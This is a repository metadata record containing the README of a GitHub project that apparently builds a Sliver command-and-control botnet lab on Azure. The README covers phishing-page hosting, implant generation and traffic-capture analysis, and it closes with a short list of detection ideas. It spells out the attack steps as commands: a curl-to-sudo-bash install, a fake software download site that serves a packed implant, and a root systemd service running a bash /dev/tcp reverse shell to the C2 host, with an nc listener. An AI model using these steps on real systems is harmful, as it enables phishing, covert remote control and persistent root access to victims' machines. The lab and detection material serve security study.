{"id":25523760,"url":"https://github.com/mohamedmostafa010/c2lab","last_synced_at":"2026-05-05T04:11:27.718Z","repository":{"id":277542580,"uuid":"932747462","full_name":"MohamedMostafa010/C2Lab","owner":"MohamedMostafa010","description":"C2Lab - A lightweight and customizable Command \u0026 Control (C2) lab using Sliver for testing and analyzing botnet communications, persistence, and network detection techniques.","archived":false,"fork":false,"pushed_at":"2025-03-06T09:53:20.000Z","size":7922,"stargazers_count":2,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-05-21T16:12:00.783Z","etag":null,"topics":["azure","azurerm","botnet","botnet-tool","botnets","c2","c2c","cnc","commandandcontrol","lab","labs","pcap","pcap-analyzer","pcap-files","pcaps","sliver","terraform","wireshark"],"latest_commit_sha":null,"homepage":"","language":"HCL","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/MohamedMostafa010.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2025-02-14T12:55:21.000Z","updated_at":"2025-05-12T16:28:36.000Z","dependencies_parsed_at":null,"dependency_job_id":"b22ade4a-49e9-466a-802f-4233112455f4","html_url":"https://github.com/MohamedMostafa010/C2Lab","commit_stats":null,"previous_names":["mohamedmostafa010/c2lab"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/MohamedMostafa010/C2Lab","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/MohamedMostafa010%2FC2Lab","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/MohamedMostafa010%2FC2Lab/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/MohamedMostafa010%2FC2Lab/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/MohamedMostafa010%2FC2Lab/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/MohamedMostafa010","download_url":"https://codeload.github.com/MohamedMostafa010/C2Lab/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/MohamedMostafa010%2FC2Lab/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":32634814,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-05-04T10:08:07.713Z","status":"online","status_checked_at":"2026-05-05T02:00:06.033Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["azure","azurerm","botnet","botnet-tool","botnets","c2","c2c","cnc","commandandcontrol","lab","labs","pcap","pcap-analyzer","pcap-files","pcaps","sliver","terraform","wireshark"],"created_at":"2025-02-19T19:20:21.620Z","updated_at":"2026-05-05T04:11:27.712Z","avatar_url":"https://github.com/MohamedMostafa010.png","language":"HCL","funding_links":[],"categories":[],"sub_categories":[],"readme":"# C2Lab \n\n- **C2Lab** - A lightweight and customizable **Command \u0026amp; Control (C2) lab using Sliver** for testing and analyzing **botnet communications, persistence, and network detection techniques.**\n\n## 🚀 Project Overview\n\n- This lab demonstrates how to set up a **C2 infrastructure using Sliver, deploy bots, establish communication over mTLS, and implement persistence** while capturing network **traffic for analysis.**\n\u003cimg src=\"assets/sliver_framework.jpg\" width=\"400\" alt=\"Sliver C2 Framework Logo\" /\u003e\n\n## 🛠 Features\n\n- **Terraform (IaC) automation** for deploying the **C2 server and botnet machines.**\n- **mTLS-secured C2 communication** over port **443.**\n- **Fake website hosting** for social engineering.\n- **Persistent reverse shell** with a **systemd service.**\n- **PCAP captures** for analyzing C2 and bot interactions.\n- **Detection techniques** for identifying encrypted C2 traffic.\n\n## 📌 Steps Performed\n\n1️⃣ **Infrastructure Deployment**\n- Used Terraform to deploy (as in the below picture, also Terraform scripts are included in that repo):\n  - C2 Machine\n  - Botnet Machines (2 bots)\n  \u003cimg src=\"assets/Deployed_C2_and_Botnet.png\" width=\"400\" alt=\"Deployed Machines from Azure Dashboard\" /\u003e\n\n2️⃣ **Setting Up the C2 Server**\n- SSH into C2 machine (you can change the username from the .tf script by the way)\n  ```sh\n  ssh azureuser@[C2 Machine Public IP Address]\n  ```\n- Installed Sliver\n  ```sh\n  curl https://sliver.sh/install|sudo bash\n  sliver\n  ```\n- Generated an Implant (Malicious Payload), then Created a Listener on Port 443 using mTLS (See [Multiple Domains/Protocols Section](https://sliver.sh/docs?name=Getting+Started), if you want to use Multiple Protocols\n  ```sh\n  sliver \u003e generate --mTLS [C2 Machine Public IP Address] --os linux --arch amd64 --save [Payload Name]\n  chmod +x [Payload File]\n  tar -cvpf [Payload File].tar /path/to/[Payload File]\n  ```\n  \u003cimg src=\"assets/Sliver_Generating_Implant.png\" width=\"500\" alt=\"Sliver Generating Implant (Malicious Payload)\" /\u003e\n\n3️⃣ **Fake Website Hosting (HTML File Includedd)**\n\n- Created a phishing-style HTML page to simulate a real website.\n- **Website Purpose:** The fake website mimics a Software Download Center, designed to appear legitimate while serving a malicious payload.\n- The malicious file **(test_file.tar)**, a compressed archive containing the Sliver implant. The attacker packs the file into a **.tar archive to maintain file permissions**, ensuring that execution privileges remain intact when extracted by the victim.\n  \n   \u003cimg src=\"assets/Test_File.png\" width=\"500\" alt=\"Our Archived Malicious File\" /\u003e\n- Hosted it on the C2 server\n- Transferred the HTML file to **/var/www/html/index.html** on the C2 machine.\n- Transferred the our **Malicious File test_file.tar** also to **/var/www/html/** on the C2 machine.\n- Hosted the website using **Apache** by placing it in the default web root directory.\n- Restarted the Apache service using\n  ```sh\n  sudo systemctl restart apache2\n  ```\n- This made the fake website accessible over HTTP.\n\u003cimg src=\"assets/Our_Malicious_Website.png\" width=\"500\" alt=\"Our Malicious Made\" /\u003e\n\n4️⃣ **Establishing the Connection**\n\n- I know this is a very simple trick, but let’s simulate a deceived victim who falls for the fake website. The unsuspecting user, thinking they are downloading legitimate software, clicks the Download button or manually retrieves the file using curl:\n  ```sh\n  curl -O http://[C2 Machine Public IP Address]/test_file.tar\n  ```\n- At this point, the victim has downloaded test_file.tar, unaware that the attacker intentionally packed it as a .tar archive to maintain execution permissions when extracted.\n- After downloading, the victim extracts and executes the file:\n  ```sh\n  tar -xvf test_file.tar\n  ./test_file\n  ```\n- This action initiates the C2 connection, allowing the attacker to gain control over the compromised system.\n  \n  \u003cimg src=\"assets/Executing_Malware_on_both.png\" width=\"560\" alt=\"Execution of our Malicious test_file Sample\" /\u003e\n  \u003cimg src=\"assets/Bot_0_Connected.png\" width=\"560\" alt=\"Bot 0 Executed our Malicious File, then Connected Back\" /\u003e\n  \u003cimg src=\"assets/Bot_1_Connected.png\" width=\"560\" alt=\"Bot 1 Executed our Malicious File, then Connected Back\" /\u003e\n  \u003cimg src=\"assets/Sessions.png\" width=\"560\" alt=\"Sessions Sample\" /\u003e\n\n5️⃣ **Persistence Setup**\n- Created a **systemd service (persistence.service)** for a persistent **reverse shell**\n- Configured it to automatically restart upon failure\n- Service Unit File Made (Port Chosen was 7777):\n  ```sh\n  [Unit]\n  Description=Persistence Service\n  After=network.target\n  StartLimitIntervalSec=60  # Reset limit every 60 seconds\n  StartLimitBurst=10        # Allow up to 10 restarts in this period\n  \n  [Service]\n  ExecStart=/bin/bash -c 'bash -i \u003e\u0026 /dev/tcp/[C2 Machine Public IP Address]/[Desired Port] 0\u003e\u00261'\n  Restart=always\n  RestartSec=10\n  User=root\n  \n  [Install]\n  WantedBy=multi-user.target\n  ```\n- This service continuously attempts to establish a reverse shell to C2 Machine on port X (7777 was chosen). If the process fails, systemd automatically restarts it, ensuring persistence.\n- After creating the service file (/etc/systemd/system/persistence.service), we enable and start it:\n  ```sh\n  sudo systemctl daemon-reload\n  sudo systemctl enable persistence\n  sudo systemctl start persistence\n  ```\n  \u003cimg src=\"assets/Enabling_Persistance_on_Botnet.png\" width=\"560\" alt=\"Asking for a Shell and Making Our Malicious Systemd Service\" /\u003e\n- Each time the attacker's machine runs:\n  ```sh\n  nc -l [Desired Listening Port]\n  ```\n- After a few seconds, the bot will establish a reverse shell connection as a root user due to the persistent systemd service. This ensures that as long as the bot remains online, the attacker can repeatedly regain access whenever they listen on port 7777.\n\n  \u003cimg src=\"assets/Reverse_Shell_Gained.png\" width=\"500\" alt=\"Reverse Shell Gained\" /\u003e\n\n- There are many other ways for gaining a persistent **reverse shell** not just **systemd, but also you can add cron jobs, kernel implants, or SSH backdoors.**\n\n6️⃣ **Traffic Capture \u0026 Analysis**\n\n- Captured network traffic using tcpdump/Wireshark **(botnet-vm-0 Private IP Address: 10.2.1.5, botnet-vm-1 Private IP Address: 10.2.1.4, C2 Machine Public IP Address: 13.91.62.40)**:\n  - Bot ➝ C2 (mTLS encrypted session): The bot-vm-0 (with private IP address of 10.2.1.5) downloads test_file.tar using an HTTP GET request. Screenshot from **capture_when_downloading_the_malicious_file.pcap**, apply **http.request.method == \"GET\"** to get intended packets more faster.\n\n    \u003cimg src=\"assets/VM0_Downloading_the_Malicious_File.png\" width=\"1250\" alt=\"VM0 Downloading the Malicious File\" /\u003e\n  - Bot ➝ C2: Executing the Malware (test_file). Screenshot from **capture_when_executing_the_malicious_file.pcap**, apply **ip.dst == 13.91.62.40** to get intended packets more faster.\n    \n    \u003cimg src=\"assets/VM0_Executing_the_Malicious_File.png\" width=\"750\" alt=\"VM0 Executing the Malicious File\" /\u003e\n  - Bot ⟷ C2: After execution, encrypted communication occurs between the bot and C2, where commands and responses are exchanged. Check **capture_from_C2_to_botnet.pcap**\n  - Bot ➝ C2 (Persistence): A reverse shell connection is established to port 7777. Screenshot from **persistence_shell_on_port_7777.pcap**, apply **tcp.port == 7777** to get intended packets more faster.\n\n    \u003cimg src=\"assets/VM0_Establishing_the_Reverse_Shell.png\" width=\"1150\" alt=\"VM0 Establishing the Reverse Shell Back to the C2 Machine on Port 7777\" /\u003e\n- **Note:** Since all traffic is encrypted, detection techniques were explored. One key observation is that **Wireshark's \"Resolve Network Addresses\" option** was disabled by me, meaning IPs are not automatically translated into their associated domain names. However, enabling this option **(View \u003e Name Resolution \u003e Check Resolve Network Addresses)** reveals that our C2 server resolves to **softwaredownloadcenter.westus.cloudapp.azure.com.** This domain name, while appearing legitimate, could still raise suspicion upon closer inspection—especially in an environment where C2 traffic is actively monitored.\n\n## 🔍 Detection Techniques\n\n- Even though C2 traffic is encrypted (mTLS), potential detection methods include:\n1. **Traffic Pattern Analysis**\n    - Monitor unusual outbound connections from private IPs to an unknown public IP\n    - Look for long-lived TLS connections\n2. **Process Monitoring**\n    - Detect execution of unknown binaries\n    - Monitor systemd services for persistence\n3. **DNS Analysis**\n   - Identify suspicious domain resolution requests from bots\n4. **Behavior-Based Rules (SIEM/IDS)**\n   - Write a YARA rule for detecting Sliver implants\n   - Use Suricata/Snort for C2 traffic anomaly detection\n\n## 🔥 Enhancements \u0026 Additions Can be Added Later\n\n- Explore **DGA (Domain Generation Algorithms)** to dynamically generate C2 domains.\n- Demonstrate DNS tunneling (**like dnscat2for**) C2 instead of using direct IPs.\n- Implement **HTTP/S-based C2 using custom headers** (e.g., mimicking legit traffic).\n\n## 📜 Disclaimer\n- This project is for educational and research purposes only. Any unauthorized use in real-world environments is strictly prohibited.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmohamedmostafa010%2Fc2lab","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fmohamedmostafa010%2Fc2lab","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmohamedmostafa010%2Fc2lab/lists"}